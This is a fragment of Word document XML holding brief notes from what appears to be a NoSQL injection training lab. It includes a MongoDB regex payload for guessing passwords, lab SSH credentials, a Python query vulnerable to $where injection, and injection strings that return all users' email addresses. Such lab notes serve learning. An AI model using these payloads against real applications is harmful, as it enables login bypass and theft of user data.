    <w:p w14:paraId="7782B77B" w14:textId="470C59AE" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user=admin&amp;pass[$regex]=^</w:t>
      </w:r>
      <w:r>
        <w:t>a….</w:t>
      </w:r>
      <w:r>
        <w:t>$&amp;remember=on =&gt; HTTP Response Header Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /sek …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A403DE" w14:textId="77777777" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085A9935" w14:textId="5050A49A" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ex: We have a Python app that allows us to receive the email address of any username that is provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EA40C2" w14:textId="77777777" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F220CE" w14:textId="5B49EEBD" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00B87526">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>syntax@10.10.65.222</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> – password:syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68988318" w14:textId="16E7F0EF" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>admin’ – generate errors: one error message shows us that there is Syntax Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF5C35" w14:textId="2E9309CF" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>for x in mycol.find({“$where”: “this.username == ‘” + username + “’”}):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F053A9" w14:textId="77777777" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5218F94A" w14:textId="27CC818B" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>admin’ &amp;&amp; 0 &amp;&amp; ‘x – nothing happened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3B461C" w14:textId="7DB686FC" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>admin’ &amp;&amp; 1 &amp;&amp; ‘x – admin’s email address appears</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DDEF19" w14:textId="27915D31" w:rsidR="00A941FE" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>admin’||1||’ – displays all email addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DFE7F1" w14:textId="3FB9BCAB" w:rsidR="00A941FE" w:rsidRPr="00AB0DB0" w:rsidRDefault="00A941FE" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A941FE" w:rsidRPr="00AB0D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F72D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A62EB46"/>
    <w:lvl w:ilvl="0" w:tplc="A74A5F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8032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A0F"/>
    <w:rsid w:val="003206CD"/>
    <w:rsid w:val="003E28F2"/>
    <w:rsid w:val="004F2A0F"/>
    <w:rsid w:val="00530AC9"/>
    <w:rsid w:val="00662B9B"/>
    <w:rsid w:val="00694B81"/>
    <w:rsid w:val="007C32B3"/>
    <w:rsid w:val="00962503"/>
    <w:rsid w:val="00A941FE"/>
    <w:rsid w:val="00AB0DB0"/>
    <w:rsid w:val="00DC0E60"/>
    <w:rsid w:val="00E4665D"/>
    <w:rsid w:val="00FA2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F0C92"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{512F01F8-3064-4976-BC6B-E6ED3C210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A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A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A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A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A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A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A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A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A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A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A0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41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41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6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yntax@10.10.65.22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Talos Alexandru</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Talos Alexandru</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-24T09:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-24T11:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>